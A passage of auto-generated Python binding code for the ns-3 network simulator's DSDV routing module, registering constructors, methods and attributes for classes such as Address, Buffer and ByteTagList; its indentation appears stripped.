register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
register_Ns3SimpleRefCount__Ns3HashImplementation_Ns3Empty_Ns3DefaultDeleter__lt__ns3HashImplementation__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >'])
register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3Socket_methods(root_module, root_module['ns3::Socket'])
register_Ns3SocketAddressTag_methods(root_module, root_module['ns3::SocketAddressTag'])
register_Ns3SocketIpTosTag_methods(root_module, root_module['ns3::SocketIpTosTag'])
register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag'])
register_Ns3SocketIpv6HopLimitTag_methods(root_module, root_module['ns3::SocketIpv6HopLimitTag'])
register_Ns3SocketIpv6TclassTag_methods(root_module, root_module['ns3::SocketIpv6TclassTag'])
register_Ns3SocketSetDontFragmentTag_methods(root_module, root_module['ns3::SocketSetDontFragmentTag'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
register_Ns3TriangularRandomVariable_methods(root_module, root_module['ns3::TriangularRandomVariable'])
register_Ns3UniformRandomVariable_methods(root_module, root_module['ns3::UniformRandomVariable'])
register_Ns3WeibullRandomVariable_methods(root_module, root_module['ns3::WeibullRandomVariable'])
register_Ns3ZetaRandomVariable_methods(root_module, root_module['ns3::ZetaRandomVariable'])
register_Ns3ZipfRandomVariable_methods(root_module, root_module['ns3::ZipfRandomVariable'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3ConstantRandomVariable_methods(root_module, root_module['ns3::ConstantRandomVariable'])
register_Ns3DeterministicRandomVariable_methods(root_module, root_module['ns3::DeterministicRandomVariable'])
register_Ns3EmpiricalRandomVariable_methods(root_module, root_module['ns3::EmpiricalRandomVariable'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3ErlangRandomVariable_methods(root_module, root_module['ns3::ErlangRandomVariable'])
register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
register_Ns3ExponentialRandomVariable_methods(root_module, root_module['ns3::ExponentialRandomVariable'])
register_Ns3GammaRandomVariable_methods(root_module, root_module['ns3::GammaRandomVariable'])
register_Ns3IpL4Protocol_methods(root_module, root_module['ns3::IpL4Protocol'])
register_Ns3Ipv4_methods(root_module, root_module['ns3::Ipv4'])
register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
register_Ns3Ipv4Interface_methods(root_module, root_module['ns3::Ipv4Interface'])
register_Ns3Ipv4L3Protocol_methods(root_module, root_module['ns3::Ipv4L3Protocol'])
register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
register_Ns3Ipv4MulticastRoute_methods(root_module, root_module['ns3::Ipv4MulticastRoute'])
register_Ns3Ipv4Route_methods(root_module, root_module['ns3::Ipv4Route'])
register_Ns3Ipv4RoutingProtocol_methods(root_module, root_module['ns3::Ipv4RoutingProtocol'])
register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
register_Ns3Ipv6Interface_methods(root_module, root_module['ns3::Ipv6Interface'])
register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable'])
register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
register_Ns3Node_methods(root_module, root_module['ns3::Node'])
register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable'])
register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper'])
register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
register_Ns3Ipv4ListRouting_methods(root_module, root_module['ns3::Ipv4ListRouting'])
register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation'])
register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a'])
register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32'])
register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64'])
register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3'])
register_Ns3DsdvDsdvHeader_methods(root_module, root_module['ns3::dsdv::DsdvHeader'])
register_Ns3DsdvPacketQueue_methods(root_module, root_module['ns3::dsdv::PacketQueue'])
register_Ns3DsdvQueueEntry_methods(root_module, root_module['ns3::dsdv::QueueEntry'])
register_Ns3DsdvRoutingProtocol_methods(root_module, root_module['ns3::dsdv::RoutingProtocol'])
register_Ns3DsdvRoutingTable_methods(root_module, root_module['ns3::dsdv::RoutingTable'])
register_Ns3DsdvRoutingTableEntry_methods(root_module, root_module['ns3::dsdv::RoutingTableEntry'])
return
def register_Ns3Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## address.h (module 'network'): ns3::Address::Address() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor]
cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor]
cls.add_constructor([param('ns3::Address const &', 'address')])
## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function]
cls.add_method('CheckCompatible',
'bool',
[param('uint8_t', 'type'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyAllFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function]
cls.add_method('CopyAllTo',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'uint32_t',
[param('uint8_t *', 'buffer')],
is_const=True)
## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buffer')])
## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function]
cls.add_method('GetLength',
'uint8_t',
[],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function]
cls.add_method('IsInvalid',
'bool',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function]
cls.add_method('IsMatchingType',
'bool',
[param('uint8_t', 'type')],
is_const=True)
## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function]
cls.add_method('Register',
'uint8_t',
[],
is_static=True)
## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buffer')],
is_const=True)
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3Buffer_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor]
cls.add_constructor([param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtEnd(uint32_t end) [member function]
cls.add_method('AddAtEnd',
'bool',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtStart(uint32_t start) [member function]
cls.add_method('AddAtStart',
'bool',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function]
cls.add_method('Begin',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Buffer',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFullCopy() const [member function]
cls.add_method('CreateFullCopy',
'ns3::Buffer',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function]
cls.add_method('End',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentEndOffset() const [member function]
cls.add_method('GetCurrentEndOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentStartOffset() const [member function]
cls.add_method('GetCurrentStartOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3BufferIterator_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function]
cls.add_method('GetDistanceFrom',
'uint32_t',
[param('ns3::Buffer::Iterator const &', 'o')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function]
cls.add_method('IsEnd',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function]
cls.add_method('IsStart',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function]
cls.add_method('Next',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function]
cls.add_method('Next',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function]
cls.add_method('Prev',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function]
cls.add_method('Prev',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function]
cls.add_method('ReadLsbtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function]
cls.add_method('ReadLsbtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function]
cls.add_method('ReadLsbtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function]
cls.add_method('ReadNtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function]
cls.add_method('ReadNtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function]
cls.add_method('ReadNtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function]
cls.add_method('Write',
'void',
[param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function]
cls.add_method('WriteHtolsbU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function]
cls.add_method('WriteHtolsbU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function]
cls.add_method('WriteHtolsbU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function]
cls.add_method('WriteHtonU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function]
cls.add_method('WriteHtonU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function]
cls.add_method('WriteHtonU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data'), param('uint32_t', 'len')])
return
def register_Ns3ByteTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagIterator::Item',
[])
return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function]
cls.add_method('GetEnd',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function]
cls.add_method('GetStart',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
cls.add_method('GetTag',
'void',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_const=True)
return
def register_Ns3ByteTagList_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor]
cls.add_constructor([])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function]
cls.add_method('Add',
'ns3::TagBuffer',
[param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function]
cls.add_method('Add',
'void',
[param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t adjustment, int32_t appendOffset) [member function]
cls.add_method('AddAtEnd',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t adjustment, int32_t prependOffset) [member function]
cls.add_method('AddAtStart',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function]
cls.add_method('Begin',
'ns3::ByteTagList::Iterator',
[param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')],
is_const=True)
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function]
cls.add_method('GetOffsetStart',
'uint32_t',
[],
is_const=True)
## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagList::Iterator::Item',
[])
return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor]
cls.add_constructor([param('ns3::TagBuffer', 'buf')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable]
cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable]
cls.add_instance_attribute('end', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable]
cls.add_instance_attribute('size', 'uint32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable]
cls.add_instance_attribute('start', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3EventId_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
